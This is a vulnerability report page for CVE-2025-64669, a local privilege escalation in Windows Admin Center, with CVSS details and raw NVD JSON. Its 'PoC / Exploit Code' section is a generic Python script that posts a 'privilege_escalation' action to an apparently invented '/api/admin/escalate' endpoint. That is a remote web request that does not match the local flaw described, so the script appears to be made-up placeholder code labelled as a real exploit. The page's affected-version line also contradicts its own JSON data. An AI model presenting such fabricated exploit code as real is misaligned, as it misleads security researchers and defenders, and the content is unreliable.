Security Vulnerability Report
中文
CVE-2025-64669 CVSS 7.8 HIGH

CVE-2025-64669

Published: 2025-12-11 18:16:24
Last Modified: 2025-12-12 17:30:10

Description

Improper access control in Windows Admin Center allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:windows_admin_center:*:*:*:*:*:*:*:* - VULNERABLE
Windows Admin Center < 2025-01-01

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests target = 'http://target:8080' payload = { 'username': 'attacker', 'password': 'low_priv_pass' } session = requests.Session() resp = session.post(f'{target}/api/auth/login', json=payload) if resp.status_code == 200: exploit = { 'action': 'privilege_escalation', 'token': session.cookies.get_dict() } exploit_resp = session.post(f'{target}/api/admin/escalate', json=exploit) print(exploit_resp.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64669", "sourceIdentifier": "[email protected]", "published": "2025-12-11T18:16:24.393", "lastModified": "2025-12-12T17:30:10.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper access control in Windows Admin Center allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:windows_admin_center:*:*:*:*:*:*:*:*", "versionEndExcluding": "2511", "matchCriteriaId": "6E6B16F7-D308-4FCC-B230-6AFFB020AFE4"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64669", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}